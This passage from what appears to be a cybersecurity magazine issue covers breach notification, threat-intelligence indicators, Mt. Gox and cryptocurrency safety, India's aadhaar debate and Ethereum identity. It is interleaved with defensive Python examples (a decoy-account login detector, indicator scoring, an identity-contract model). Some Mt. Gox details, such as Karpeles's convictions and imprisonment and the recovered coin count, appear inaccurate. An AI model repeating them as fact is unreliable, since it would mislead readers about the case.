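2018-03-01T09:16:30Z auth host=fs01 user=finance_admin_old src=10.0.9.77 result=failure
this line is malformed and must be skipped rather than crash the detector
2018-03-01T09:20:10Z auth host=web02 user=carol src=10.0.4.31 result=success
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) auth host=(?P<host>\S+) user=(?P<user>\S+) "
    r"src=(?P<src>\S+) result=(?P<result>\S+)$"
)


@dataclass(frozen=True)
class Alert:
    timestamp: str
    host: str
    user: str
    source: str
    result: str


def find_tripwire_hits(log_text: str, honey_accounts: Set[str] = HONEY_ACCOUNTS) -> List[Alert]:
    """Return one Alert per auth event that names a decoy account.
    Failures count too: a failed guess at the decoy's password still means
    someone found the account, which is exactly why it was planted."""
    hits: List[Alert] = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # malformed line: skip it, never raise
        if m["user"] in honey_accounts:
            hits.append(Alert(m["ts"], m["host"], m["user"], m["src"], m["result"]))
    return hits


def sources_to_hosts(alerts: List[Alert]) -> Dict[str, Set[str]]:
    """Pivot alerts by source address. One address touching decoys on several
    hosts is the 'roaming around your network' pattern the text describes."""
    pivot: Dict[str, Set[str]] = defaultdict(set)
    for a in alerts:
        pivot[a.source].add(a.host)
    return dict(pivot)


if __name__ == "__main__":
    hits = find_tripwire_hits(SAMPLE_LOG)
    for h in hits:
        print(f"TRIPWIRE {h.timestamp} {h.user}@{h.host} from {h.source} ({h.result})")
    print(sources_to_hosts(hits))
```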
Fast detection and containment, combined with a good prevention security strategy, can make the difference between needing or not needing to send that email, or putting a message up on your website. Nobody wants to be in the position where they need to tell their customers that their data has disappeared off into the realms of Breachedland, or that they are unable to provide a service because all their systems are displaying ransomware messages. Breach notification is not just about a message; it’s about good preparation, regular review, and having the right tools and people at your disposal. And printers, they really are your friend.
About the Author
Jill of many trades, mistress of a few. Samantha has spent most of her working life entrenched in the world of cyber security. As you can imagine, she loves it. Her career has spanned many areas of the business - sales, technical support, solutions marketing, channel support, outbreak management and incident response, engineering and researcher management, product management, and more. She likes solving problems and making customers happy. She fully believes that it’s wonderful to be able to do what you love.
Everything you need to know about breach notifications
By Mark Jones

When the board approaches you for guidance on how changing legal requirements could impact the organisation, how prepared are you? As cyber professionals, it seems the goal posts are constantly moving, be it a new legal requirement, ever-expanding information sets, contractual relationships, adoption of cloud services, and of course the ever-evolving threat. It’s very clear, talking with our Global Threat Intelligence Centre, that our adversaries are innovating and outpacing organisations’ response, so we have to get smarter in our approach. In my last article, in Issue 2, I wrote largely of that evolving threat landscape, the challenges in keeping up with the bad guys, and how to identify the good as well as the bad, to close the gap. Given the changes to breach notification, that is particularly pertinent; however, first I’ll take a few steps back and look at what we do and why.
The Why, What’s and How’s

At a high level, three things direct a business: management of opportunity and risk, strategy, and the stuff we have to do [aka compliance]. These three things dictate the people, process and tools being used by an organisation, the information and resources required to achieve an outcome, and hopefully, how we measure and report to make sure it’s all working properly. Sounds easy, right? So, why point it out? Whilst we should ideally understand the above, we don’t always know our personnel, their relationships outside of work, or even in work, what they do day to day, or indeed what tools they use. How many of you have done an assessment of business process, application, contracts and services, not to mention information flow? Most organisations know the big stuff, such as that big database with all their customer details in it, but have you considered telematics, industry data, that random IoT device or any number of other things?
The Who - Not the band (for those of us old enough to remember)

As a cyber professional, one of our main objectives is to confirm that the right people are accessing and using the right information, that it’s available when they need it and is accurate. If that’s our objective, then conversely, we also need to be able to identify when it’s the wrong people, or wrong or inaccurate information. That’s done by identifying the threat actor, through threat intelligence.

We’ve all heard of an indicator of compromise (IoC): a metric, something that can be measured, which alludes to a host being in a compromised state. Most technologies we know rely on these measures – a pattern, source, destination, sequence of actions – to take some action in response. IoCs are important, because they add a certain level of certainty to any ‘hit’; however, whilst actors may often use the same techniques, an IoC alone is arguably reactive: someone had to have done it before, to identify it as a compromise and define a measure. Thankfully there are many indicators in life, and a strong threat intelligence capability is born out of others, such as opportunity, intent, financial, success or even personnel engagement. Imagine for one moment that you knew an employee was being coerced by a competitor or was in financial difficulty. What about that supplier who’s been letting things slip on social media – would that influence your assessment of the threat?

The Sequence

Rather than trying to gather some or all of the information, then trying to make sense of it, take a step back and look at what you’d like to measure. To do that we look at a given business problem. Take Spear-Phishing as an example: from our last Global Threat Intelligence Report, phishing accounted for 73% of malware delivered to organisations. The attack chain can vary, but is reasonably consistent. Simplistically, someone finds information about an employee, sends a crafted email either with a payload or a link, malware is downloaded or credentials stolen, and voila! So, we know what they’re doing, and how they’re doing it, and this is where we have an advantage. Payload or content information is great, but is usually at or near the end of the chain, and as we know struggles to cater for increasingly bespoke attacks. However, if we can identify indicators in the sequence of events within the attack chain then we have more opportunities to stop the bad guys. The challenge is that while an IoC is based on validated data, many other indicators are not, and as such might not be able to be acted upon alone. By definition though, this is where Threat Intelligence should be: it’s about deriving an opinion to take action based on context, not just the end result. To use an analogy: a battle is not won by understanding the bomb, it’s won by knowing there’s an unidentified plane flying nearby, where it took off from, the fuel that was ordered and flight plan, or the command to plan the mission. The further we get up the chain of events the better.

The Response

Looking at a sequence of events, even at a high level, we can determine things we can measure. If we take Spear-Phishing again: has there been any whisper of an acquisition, or presence in the news? Can information be obtained from public profiles of personnel or a family member? Did a supplier announce a contract or have you listed as a customer? Has there been any chatter in actor communities about the company, supplier or personnel? Is the employee happy? All these things provide an indication of the initial stages of an attack, and can be referenced to measures further down the chain: do we know what an actor is targeting? Do we see email from someone we don’t have a relationship with? Does a web page have a logon? Has it been used before? Have credentials been used on a host before? What time of the day, location, or session duration? Have new bank details been added to the system? Is there a new binary we haven’t seen before? The list goes on, and however you categorise them, be they indicators of risk and opportunity, threat, compromise, fraud or personnel engagement, the objective is the same – know what to measure, where to get it, how to determine a level of assurance, and how to use it. Context is king and invaluable in supporting triage and response efforts, and an organisation that leverages threat intelligence successfully constantly evaluates the threat landscape, informing the business on how to defend in the most effective way with the resources available. So, next time you’re asked, “Are we prepared?”, be the one with the reports ready to go; don’t be the one being told you’re not compliant, or that your information is out there.
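The chain-of-indicators argument above, as an added example that is not from the article: weak indicators are scored per person across attack-chain stages within a 72-hour window, so that several of them together reach a level of assurance that none of them carries alone. Indicator names, stages, weights, thresholds and the sample events are all constructed for illustration.

```python
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Indicator catalogue: name -> (chain stage, weight). Stages follow the order in
# the text: reconnaissance, delivery, credential use, execution, fraud.
INDICATORS: Dict[str, Tuple[str, int]] = {
    "news_mention":              ("recon", 1),
    "public_profile_exposed":    ("recon", 1),
    "email_unknown_sender":      ("delivery", 2),
    "logon_page_first_seen":     ("delivery", 2),
    "first_credential_use_host": ("credential_use", 3),
    "unusual_logon_time":        ("credential_use", 2),
    "new_unseen_binary":         ("execution", 3),
    "bank_details_changed":      ("fraud", 4),
}

WINDOW = timedelta(hours=72)  # constructed: how long a chain is allowed to span


@dataclass(frozen=True)
class Event:
    when: datetime
    entity: str      # person or host the indicator relates to
    indicator: str


@dataclass(frozen=True)
class Assessment:
    entity: str
    score: int
    stages: Tuple[str, ...]
    action: str      # "act", "triage" or "monitor"


def assess(events: List[Event], window: timedelta = WINDOW) -> List[Assessment]:
    """Rate each entity on its strongest window of related indicators.
    Assurance comes from breadth across chain stages rather than raw count:
    three stages (or a high score) -> act; two stages -> triage; else monitor."""
    by_entity: Dict[str, List[Event]] = defaultdict(list)
    for e in events:
        if e.indicator not in INDICATORS:
            raise ValueError(f"unknown indicator: {e.indicator}")
        by_entity[e.entity].append(e)

    results: List[Assessment] = []
    for entity, evs in by_entity.items():
        evs.sort(key=lambda e: e.when)
        best_score, best_stages = 0, ()
        for i, start in enumerate(evs):
            in_window = [e for e in evs[i:] if e.when - start.when <= window]
            stages = tuple(sorted({INDICATORS[e.indicator][0] for e in in_window}))
            score = sum(INDICATORS[e.indicator][1] for e in in_window)
            if (len(stages), score) > (len(best_stages), best_score):
                best_score, best_stages = score, stages
        if len(best_stages) >= 3 or best_score >= 7:
            action = "act"
        elif len(best_stages) == 2:
            action = "triage"
        else:
            action = "monitor"
        results.append(Assessment(entity, best_score, best_stages, action))
    return sorted(results, key=lambda a: a.score, reverse=True)


# Constructed events: one person walks the phishing chain, one shows early
# stages only, one has two isolated credential-use signals a month apart.
T0 = datetime(2018, 3, 5, 8, 0)
SAMPLE_EVENTS = [
    Event(T0, "j.smith", "public_profile_exposed"),
    Event(T0 + timedelta(hours=20), "j.smith", "email_unknown_sender"),
    Event(T0 + timedelta(hours=21), "j.smith", "logon_page_first_seen"),
    Event(T0 + timedelta(hours=30), "j.smith", "first_credential_use_host"),
    Event(T0, "a.lee", "news_mention"),
    Event(T0 + timedelta(hours=5), "a.lee", "email_unknown_sender"),
    Event(T0 - timedelta(days=30), "p.ng", "first_credential_use_host"),
    Event(T0, "p.ng", "unusual_logon_time"),
]

if __name__ == "__main__":
    for a in assess(SAMPLE_EVENTS):
        print(f"{a.entity:8} score={a.score:2} stages={a.stages} -> {a.action}")
```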
Cryptocurrency Insecurity: Mt. Gox, where are our bitcoins?
By Guillaume Noé
Mark Karpeles bowed in front of the Japanese press with his eyes closed. He looked deeply humbled and uncomfortable. He was apologising to his clients for having lost 750,000 of their bitcoins, and an extra 100,000 bitcoins owned by his company. Karpeles was the CEO of Mt. Gox, a bitcoin exchange based in Tokyo, Japan. By 2013, Mt. Gox was the biggest bitcoin exchange in the world, handling 70% of global bitcoin trading. At a press conference on February 28, 2014, Karpeles referred to some "weakness in the system" and blamed hackers for the loss. At the time, the lost 850,000 bitcoins were worth $473M USD. By early November 2017, those bitcoins would have been worth $5.57B USD. The Mt. Gox clients impacted by the loss have been denied a substantial profit from their early investment in the cryptocurrency.

Hackers allegedly exploited an application business logic vulnerability on the exchange trading web app. Tokyo security company WizSec investigated the case and concluded that most or all of the missing bitcoins were stolen straight out of the Mt. Gox hot wallet over time, beginning in late 2011. When discovered and reported in February 2014, it was a disaster overnight. The exchange shut down. Mt. Gox filed for bankruptcy and left many of their clients short of their valuable bitcoins.

There is more to the story of Karpeles and Mt. Gox. 100,000 client bitcoins were eventually recovered. Karpeles was also found guilty of fraud, embezzlement and financial mismanagement in a charge unrelated to the missing client bitcoins. He ended up in prison. The case of Mt. Gox shook the cryptocurrency ecosystem and set a strong precedent for the risks of cryptocurrencies.
Cryptocurrency security risks

Bitcoin and other cryptocurrencies are fast growing in popularity, and not only with high-risk investors. They are becoming mainstream and they are offering a valid payment option with the likes of Microsoft, Dell, Expedia and a growing number of businesses, including in Australia (see coinmap.org). Christine Lagarde, the Head of the International Monetary Fund (IMF), suggested that virtual currencies could offer better value, better payment services and would present a fresh idea to central bankers. At the time of writing, and through non-exhaustive research, I quickly counted 15 exchanges covering Australia and 22 cryptocurrency ATMs deployed nationally (cointatmradar.com). Of the 15 exchanges, 5 were Australian companies. A joint venture between StarGroup and DigitalX is also reported to be in the process of equipping 2,900 existing traditional ATMs with two-way bitcoin transaction functionality to buy and sell the cryptocurrency in many places in Australia.

However, cryptocurrencies are virtual assets managed in an unregulated financial system. They are high risk. They can disappear very quickly when their security is compromised, and a humble apology from a CEO may be all there is to get as a consolation. The security risks I associate with cryptocurrencies include:
1. Failure of the blockchain - Unlikely. This risk is very unlikely due to the blockchain architecture, especially with common cryptocurrency blockchains with large groups of participating nodes.
2. Failure of the exchange - Possible. This risk is clearly possible. There are precedents of exchanges being hacked, such as Mt. Gox. Exchange hot wallets have been compromised.
3. Failure of the wallet - Likely. This risk is likely. Hot wallets with no backups are simply lost. Unsecured wallets can be compromised through vulnerabilities applying to the endpoint (e.g. mobile phone), the wallet software and of course the user and how they protect their wallet private keys. Michel Sassano recently published an amazing article reporting on how his team managed to recover a wallet private key from a screenshot image of a live TV program broadcast in France. The image of a bitcoin wallet private key QR code and string had been purposely obfuscated. However, the picture was not obfuscated well enough and led to the private key recovery through an 8-step process and a bit of luck. The wallet contained a value of $1,000. This report clearly highlights the risk of wallet protection failure through private key compromise.
My initiation to cryptocurrencies

I strongly associate Karpeles’ apology picture with the risks of cryptocurrencies. Being cyber security conscious, and without an ounce of a gambler in me, I had never been tempted to risk my money with any virtual currencies, until recently. I finally resolved to give it a shot and to reflect on the experience. The plan was simple. I had to procure some bitcoins and buy something with them.
Choosing an exchange

Before entrusting my money to a cryptocurrency exchange, I did some research and down-selected two exchanges. My selection was based on online reviews, some articles and forum discussions that I read. I paid attention to the volumes the exchanges trade and their lack of mentions in hacking news. I also considered their transaction fees, but it wasn't a critical factor in my selection. The first exchange I selected is based in Australia and the second one in the USA. I then proceeded to register myself with the 2 exchanges.
Registering The process was similar between the 2 exchanges and included the following steps: 1. Register basic account details. Set username (email address) and password, and verify the email address. 2. Setup two-factor authentication. Exchange #1 uses SMS OTP. Exchange #2 uses Google Authenticator. 3. Verify identity. The process was similar in approach and involved submitting some pictures of identity documents that are subject to verification. - Exchange #1 required 3 documents: a driver’s license, a photo of myself holding an A4 piece of paper with a handwritten note stating my identity and including a secret code I was provided on the document upload page, and a recent utility bill. The verification process took about 1 week to complete. It finished with a phone call with an operator asking further questions including: Was the account for me or somebody else? And did I intend to invest my superannuation (pension) fund in cryptocurrencies? - Exchange #2 required 1 document only: either a passport, a driver’s license or a photo ID. The verification process took about 2 minutes to complete. It seems the process was fully automated. I was actually curious to test the upload of a wrong picture (not an identity document) and it was not accepted. I then provided a correct ID document and it worked. There was no phone call.
Exchange security

Exchange #1 had called me as part of the identity verification process. I answered their questions and then took the opportunity to ask some questions about the security of their exchange; I simply couldn't resist. The operator who had called me was new to the company and didn't know much about how they handled security. She offered me a call from her manager, which I accepted. The manager called soon after and kindly indulged a 30-minute discussion, taking all my questions and answering them clearly and directly. She was transparent, at a high level, about what they did and didn't do. At the end of the call, I was left with the following thoughts:
• The exchange was transparent on security. I felt they were honest with me, and I was thankful for the opportunity to discuss the subject with them openly. That was great customer service.
• I didn't find comfort in their security story. I understood that they took the matter seriously, and they had reportedly never been hacked. However, I didn't get a sense of any robust security risk management. There was no dedicated team or function focusing on security. They also had no security certification such as ISO 27001. I don't value security certifications very highly, in the sense that they provide no guarantees, but in this case it would at least have been something and an element of comfort. The key recommendation I was given was not to leave too much credit online in their hot wallets but to move it to cold storage instead (i.e. don't leave too much money with us). It is indeed good advice. Overall, however, I wonder whether she was the right person to speak to on security. She may have undersold it, and I was left with a persisting feeling of doubt.
Aside from the phone call, exchange #1 does not have much information about security on its website at all. With exchange #2, I didn't get the opportunity of a phone call. However, their website Q&A did provide some valuable information, covering:
• Insurance cover in case of a hack; and, very importantly,
• 98% cold storage. They would only keep up to 2% of customer funds online and the rest in cold storage. Exchange #1 had no such practice; I had asked them the question.

Australian Cyber Security Magazine | 59

Buying cryptocurrencies

The exchanges I registered with support the following methods to procure cryptocurrencies:
• Exchange #1: POLi payments, BPAY and cash deposit;
• Exchange #2: credit/debit card only (at least for Australia).
I went with exchange #2 for two reasons: 1. I was ready to transact within minutes of registration, because the identity verification process was automated (compared to a 1-week process with exchange #1); and 2. their security story gave me more confidence. I registered a debit card and quickly procured a small amount of litecoins (LTC) and bitcoins (BTC).

Using cryptocurrencies

I paid my monthly private VPN fee with bitcoins, which also happens to be discounted compared to paying in other currencies. It was very easy to do. The only inconvenience was a 35-minute wait for the transaction to receive its first confirmation (inclusion in a block), which the recipient required before acknowledging payment.

Cryptocurrencies security thoughts

I am still a novice cryptocurrency user, but my initiation left me with the following thoughts.

For users

For novice cryptocurrency users like me, I would suggest:
• Select the exchange thoughtfully. Do your research. Consider large, reputable exchanges. Check the regulations that apply to them. Check their security information (e.g. 2FA supported). You may ask whether they hold cyber security insurance, providing some guarantee on your funds, and, very importantly, whether they store the majority of their clients' virtual funds in cold storage.
• Set a strong password for your account.
• Set up two-factor authentication (prefer an authenticator app over SMS OTP, which is exposed to SIM-swap attacks).
• Don't leave too many virtual funds on the exchange. Store your cryptocurrencies in cold storage (aka an offline wallet).
• When using your own wallets (e.g. on your mobile phone or desktop, as opposed to an exchange's wallet):
  - Encrypt your wallet with a strong password (that you don't forget!);
  - Back up your wallet regularly;
  - Consider offline transaction signing (requires a computer disconnected from the network) or hardware wallets (e.g. Trezor) for higher security. Check Bitcoin.org or other sources for further advice on securing your wallet; and, very importantly,
  - Do not share your private key. Keep it strictly confidential and safe.

For exchanges

If you are a new exchange, a start-up perhaps, you may find it beneficial to consider:
• Taking security seriously. Dedicate some resources to the subject. Implement an ISMS;
• Not storing all your clients' virtual funds in hot wallets (think Mt. Gox);
• Subscribing to cyber security insurance;
• Attaining a security certification (e.g. ISO 27001);
• Implementing an efficient and automated identity verification process, which is also better for the customer experience;
• Providing a good Q&A on key security questions on your website; and
• Seeking advice from professional cyber security advisors.
About the Author Gui is a Cyber Security Advisor who delivers businessfocused Cyber Security and Technology services. He is passionate about the issues of Security & Privacy, and the process to address them in both business and personal contexts. As the General Manager for Pirean in Australia & New-Zealand, Gui leads Pirean’s business development in the region with Identity and Access Management technology and services.
Cover Feature
Beyond the horizon insights: How India is coping with cyberthreats?
By Sarosh Bana, Asia Pacific Security Correspondent

A massive debate is raging across India on the right-wing Bharatiya Janata Party (BJP)-led government's agenda of mining personal data to put a mass surveillance system in place. The issue now lies before the Supreme Court, which will adjudicate on the necessity, and legality, of the 12-digit unique identification (UID) number called aadhaar that the government has mandated for availing of 139 essential services and schemes. These range from opening bank accounts, purchasing mobile phones and filing income tax returns to applying for permanent account numbers (PANs), house subsidies, even death certificates, subsidised foodgrain, healthcare and education for the desperately poor, booking train tickets, supplementary meals at crèches, and maternity benefits, vocational training and loans for underprivileged women. Requiring an iris scan and fingerprinting, biometric-based aadhaar is a single authenticator of identity and domicile, but it can also be used as a customer verification mode and for maintaining profiles. It is, however, distinct from the US's nine-digit social security number (SSN), launched in 1936 to ensure benefits and track individual earnings in the social security system. From 1961 the SSN was used by the Internal Revenue Service for identifying taxpayers, just as aadhaar is today, prompting the Carter administration in 1977 to halt its use as a national identity document. The Social Security Administration also does not fingerprint SSN applicants, as this method is associated in the public mind with criminal activity. Today, an SSN is required to secure a job and to access social security benefits and some other government services. The fear that personal information can be compromised
if aadhaar databanks are hacked has been validated by a study by the Bangalore-based Centre for Internet and Society (CIS), which indicates data leakage of over 130 million aadhaar card holders from just four government websites. The data include bank account numbers. A 31-year-old man was also arrested in August for accessing the UIDAI server illegally and without authorisation. As many as 1.1 billion of India's population of 1.34 billion have already enrolled in the aadhaar scheme. The petition before the Supreme Court contends that aadhaar enrolment, which was previously voluntary and then made compulsory, and which requires biometric profiling, treats citizens as suspects and seeks their identification rather than their identity. It cites this, the world's largest biometrics-based identity programme, as one linking sufficient data to facilitate profiling, as it can track one's spending habits, contacts and assets, even trips overseas, apart from other intrusive information. In a previous related case, the Court noted that though information may exist in silos, it has the potential to profile every individual if interlinks are established. It deemed it easy for such personal data to be routed to state surveillance mechanisms through "state and non-state entities" holding that data. The Indian government's push to advance digitisation (through its Digital India programme) has also raised questions about online vulnerability owing to possible cyber attacks. Numerous cyber attacks affecting key infrastructure assets like ports and major payment companies have made headlines recently. In India's social context, almost 70 per cent of transactions are cash-based, with the majority earning and making purchases in negligible amounts that do not require cheque or bank transfer payments. In fact, the
demonetisation initiative of the government in November 2016 had digitisation as one key purpose. While demonetisation had a grievous fallout on the national economy and businesses, especially small businesses, one major beneficiary was India's largest digital payments company, Paytm, which reported a 700 per cent surge in traffic and 1,000 per cent growth in transaction volumes post-demonetisation. This company, the majority of which is held by Chinese internet giant Alibaba and Japanese telecom major SoftBank, with its founder and CEO Vijay Shekhar Sharma holding only 19 per cent, had reported losses of Rs1,534 crore (A$313 million) in the year before demonetisation but recorded revenues of Rs814 crore (A$166 million) in the year after. Its net worth stands at Rs2,376 crore (A$485 million) and it now has over 220 million active wallet users. Recognising the importance of keeping citizens' personal data secure and protected, India's Ministry of Electronics and Information Technology (MeitY) has constituted a Committee of Experts comprising members from government, academia and industry to study and identify key data protection issues and recommend methods for addressing them. The committee will also suggest a draft Data Protection Bill. MeitY expects protection of data to provide a big boost to the country's digital economy. The Ministry last month also approved a programme called Cyber Surakshit Bharat (Cyber Secure India), proposed by an industry consortium led by Microsoft India. This programme will be executed in association with the National e-Governance Division (NeGD) to train the Chief Information Security Officers (CISOs) and other IT officers of the central and state governments, public sector banks and enterprises and other institutions to address cybersecurity challenges.
Jan Neutze, Microsoft’s Director of Cybersecurity Policy for Europe, Middle East and Africa, deems cybersecurity a vital aspect of any economy that is digitising rapidly, especially at the rate India is currently seeing. He notes that in this push to advance digitisation, India has the opportunity to avoid some of the challenges and mistakes made by other countries and ensure that security is built into its framework right from the start, rather than bolt it on at the end. “The Cyber Surakshit Bharat initiative, for which Microsoft is a partner, seeks to build out the cybersecurity capacities of CISOs across the government by training 1,200 of them,” he says. “We think this initiative has great potential and we will see if we can replicate it elsewhere in the world.” Referring to the cyber threats and security issues for businesses and industries in India and the risks to the country, he mentions that while cybercriminals are becoming more sophisticated, threats are also emanating from hostile nation-states that are developing cyberoffensive capabilities. To tackle these challenges, Microsoft last year opened a Cyber Security Engagement Centre (CSEC) in India, its mission being to drive public-private partnerships that strengthen cooperation with Indian businesses, academic organisations and government on cybersecurity. “The CSEC
also aims to fight cybercrime by securing Indian computers and internet users from various cybercrime threats by bringing together experts such as security response experts, investigators and attorneys from Microsoft's Digital Crimes Unit," says Neutze. "Cybersecurity challenges don't stop at national borders, so you need a global network of capabilities, which is exactly what we have set up." In this regard, Microsoft has opened Transparency Centres all over the world, in North and Latin America, Europe and Asia, which provide access not only to its source code but also secure access to Microsoft experts. This ensures a global approach to cybersecurity that helps mitigate threats in one part of the world and then extends this protection to customers in equal or equable ways around the world. "Microsoft's Government Security Programme currently includes over 70 organisations in more than 40 countries," observes Neutze. "We have over 3,500 internal security professionals that work on cybersecurity and cloud security at Microsoft, and invest over $1 billion on cybersecurity every year." Rajesh Maurya, the Bangalore-based Regional Vice President for India and SAARC (the South Asian Association for Regional Cooperation, comprising eight member states) of California-based cybersecurity major Fortinet, finds hyperconnectivity and the proliferation of online devices creating a criminal playground that is increasingly difficult to secure. "The proliferation of online devices accessing personal and financial information, and the growing connection of everything – from armies of IoT (internet of things) devices and critical infrastructure in cars, homes, and offices, to the rise of smart cities – have created new opportunities for cybercriminals and other threat actors," he says.
"The cybercriminal marketplace is adept at adopting the latest advances in areas such as artificial intelligence to create more effective attacks." Fortinet's just-released Global Enterprise Security Survey reveals that 87 per cent of Indian businesses surveyed are planning programmes in 2018 to educate employees in IT security, reflecting a growing awareness that breaches are caused by carelessness and ignorance as much as by malice. It also finds that 73 per cent of Indian IT decision makers (ITDMs) at organisations with 250 or more employees are confident in their cybersecurity posture, despite 84 per cent of organisations having been breached in the past two years. Additionally, 96 per cent believe they are doing better than their peers with regard to cybersecurity, while only one per cent believe they are lagging behind. Respondents reveal that 39 per cent of breaches experienced in the last two years were the result of social engineering, ransomware and email phishing. "Another top concern for Indian organisations is protecting access to the network," the study points out. "Only three quarters of ITDMs feel confident that they have full visibility and control of all devices with network access, and of the access level of all third parties who frequently have access to networks." Besides, basic security measures like network segmentation are only being planned by 21 per cent of businesses in 2018. Without network segmentation, malware entering a network will often be left to spread.
Cyber Security
SMART ID: Ethereum blockchain identity management
By Annu Singh

We all know the mere mention of the words 'Papers Please' or 'KYC' (know your customer) conjures up an uncomfortable image of a pile of documents provided by individuals as proof of identity. This picture does not get any better with Financial Technology (FinTech) and Regulatory Technology (RegTech) firms investing significant money, effort and resources in verifying, validating and storing these identity proofs. Furthermore, duplicate records are maintained across the transaction lifecycle. Keeping information consistent and up to date becomes a big challenge and a constant source of frustration, with extreme risks relating to loss of PII and identity fraud. Smart Identity is being looked at as a viable option for individuals, corporations and governments, as it introduces efficiencies into the process lifecycle of identity management and expedites verification and validation outcomes. First, let's look at what Smart Identity is and how it works. Smart Identity (Smart ID) is the digital identity of an individual created using smart contracts on Ethereum's blockchain, one of the most well-known blockchain technologies. A smart contract, in layman's
terms, is a software program that executes when defined conditions are met. To create a Smart ID, identity artefacts known as attributes (birth certificates, driving licences, addresses, passports, etc.) are added by the identity owner to the blockchain and stored within the smart contract in the form of an immutable hash; the document itself never goes on chain. Identity endorsement is performed by the attesting authority, normally a third party, storing a corresponding endorsement hash against the attribute's hash. Endorsements can be revoked by the issuing authority if needed. Endorsements act as a notarised record of attestation by a third party in relation to a specified attribute, and are stored with the attribute within the identity contract. Attributes can be added, deleted or modified by the identity owner, but endorsements can only be written by an authority holding the required key, and a modified attribute produces a new hash, so it has to be endorsed again. Smart ID works as a universal electronic passport for identity representation and verification. Users have full control over who they share their information with and which attributes are shared. Smart ID reduces the dependency on centrally provided systems or services, such as the passport office, to acquire, use and verify identity information, so there are certainly applications for this kind
“Be not another, if you can be yourself.” - Paracelsus
of service within the Federal government that have not yet been considered. Smart ID can also be used as a digital wallet for digital assets owned by an identity, as a contract representing the identity to a third party, and as a controller for identity-linked distributed applications (known as Dapps). Smart ID needs to be easy to use and low cost for wider adoption, but the upside is that it offers significantly enhanced security: the blockchain records identity attestations on an immutable, tamper-proof ledger, and each identity is tied to a cryptographic address whose private key only the individual controls. Thus private data (PII) remains under the complete control of the individual and is self-managed and certified. The corollary is that the private key is the identity: whoever holds it controls the attributes, so key backup and recovery become the owner's responsibility rather than a central helpdesk's. An Ethereum developer, Fabian Vogelsteller, proposed Ethereum Request for Comment 725 (ERC725) on GitHub in October 2017 to develop a standardised identity management system for humans and machines. ERC725 defines a standard for a unique identity for humans, groups, objects and machines. This identity can hold keys to sign actions and claims (transactions, documents, logins, access, etc.) which are attested to by third parties (issuers) or self-attested by the individual. It also serves as a proxy to act directly on the blockchain. Details can be found here: https://github.com/ethereum/EIPs/issues/725. Interest in this RFC was so intense over the first 24 hours after submission that discussions spread across social media and it trended significantly on Twitter. This is a big deal. Digital identity opens the door to wider integration into distributed master identity record management, which facilitates areas like cross-border travel and immigration, access to financial services on relocation, and the creation of risk profiles that can be used to personalise insurance products. It could also be used to transfer digital ownership of assets and IP, provide access to government services and facilitate e-voting, all of which are areas being explored through other technology solutions. But none have the immutable qualities that blockchain can offer, and none have the smart contract ecosystem that Ethereum offers. Due to its myriad advantages, many organisations and governments are exploring the Ethereum blockchain for identity management. Deloitte, Cognizant, UPort, MONI and Persona are all researching and prototyping applications in this space. Zug, a region in Switzerland known as "Crypto Valley" (the name is allegedly attributed to Ethereum co-founder Mihai Alisie; Ethereum's HQ is in Zug), has collaborated with UPort to use Ethereum blockchain identity management to create self-sovereign digital identities for its residents. Using the UPort app, citizens encrypt their personal information and receive an ID linked to a cryptographic address on the Ethereum blockchain. This address is a smart contract address known as a UPort proxy contract. Once the information is verified by the city's authorities, which needs to be done just once in person (presenting normal ID paperwork), users can use e-services such as residency proof, e-signature and parking fee payments.
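To make the attribute and endorsement mechanism described earlier in this article concrete, here is a plain-Python model of the identity contract's rules. It is an added example, not code from the article, from ERC725 or from UPort. Its assumptions: addresses are placeholder strings standing in for Ethereum accounts (a real contract would read them from msg.sender), only SHA-256 hashes of documents are stored, any account may endorse an attribute but only the endorsing account may revoke its own endorsement, and the verifier, not the contract, decides which endorsers it trusts. The passport record and addresses are constructed for the demo.

```python
"""Model of a Smart ID identity contract: attribute hashes, endorsements, revocation.

Added example for this article; not ERC725, uPort or any deployed contract.
Addresses are placeholder strings; a real contract would use msg.sender.
"""
from __future__ import annotations

import hashlib
from dataclasses import dataclass, field


def attribute_hash(document: bytes) -> str:
    """Only this digest goes on chain; the document stays with its owner."""
    return hashlib.sha256(document).hexdigest()


@dataclass
class Endorsement:
    endorser: str
    revoked: bool = False


@dataclass
class IdentityContract:
    owner: str
    # attribute hash -> label (e.g. "passport")
    attributes: dict[str, str] = field(default_factory=dict)
    # attribute hash -> endorser address -> endorsement record
    endorsements: dict[str, dict[str, Endorsement]] = field(default_factory=dict)

    def add_attribute(self, sender: str, label: str, document: bytes) -> str:
        """Owner-only. A changed document hashes to a new attribute with no
        endorsements, so any re-issued document needs fresh attestation."""
        self._require_owner(sender)
        ah = attribute_hash(document)
        self.attributes[ah] = label
        return ah

    def remove_attribute(self, sender: str, ah: str) -> None:
        """Owner-only. Removing an attribute drops its endorsements with it."""
        self._require_owner(sender)
        del self.attributes[ah]
        self.endorsements.pop(ah, None)

    def endorse(self, sender: str, ah: str) -> None:
        """Any account may endorse an existing attribute; the record is keyed
        by endorser so a verifier can later pick whom it trusts."""
        if ah not in self.attributes:
            raise KeyError("unknown attribute")
        self.endorsements.setdefault(ah, {})[sender] = Endorsement(endorser=sender)

    def revoke(self, sender: str, ah: str) -> None:
        """An endorser may revoke only its own endorsement."""
        rec = self.endorsements.get(ah, {}).get(sender)
        if rec is None:
            raise PermissionError("no endorsement by this sender")
        rec.revoked = True

    def verify(self, document: bytes, trusted_endorsers: set[str]) -> bool:
        """Verifier side: the presented document must hash to a stored attribute
        that carries a live endorsement from an endorser the verifier trusts."""
        ah = attribute_hash(document)
        if ah not in self.attributes:
            return False
        return any(addr in trusted_endorsers and not rec.revoked
                   for addr, rec in self.endorsements.get(ah, {}).items())

    def _require_owner(self, sender: str) -> None:
        if sender != self.owner:
            raise PermissionError("only the identity owner may do this")


# Constructed sample data: placeholder addresses and a made-up passport record.
ALICE, PASSPORT_OFFICE, RANDOM_ACCOUNT = "0xalice", "0xpassport-office", "0xrandom"
PASSPORT = b"passport:AU:P1234567:Alice Example:1990-01-01"


def demo() -> dict[str, bool]:
    """Issue, endorse, verify, tamper, revoke; each entry is True when the
    contract behaved as the article's model requires."""
    c = IdentityContract(owner=ALICE)
    ah = c.add_attribute(ALICE, "passport", PASSPORT)
    r = {"unendorsed_rejected": not c.verify(PASSPORT, {PASSPORT_OFFICE})}
    c.endorse(RANDOM_ACCOUNT, ah)        # an endorser the verifier does not trust
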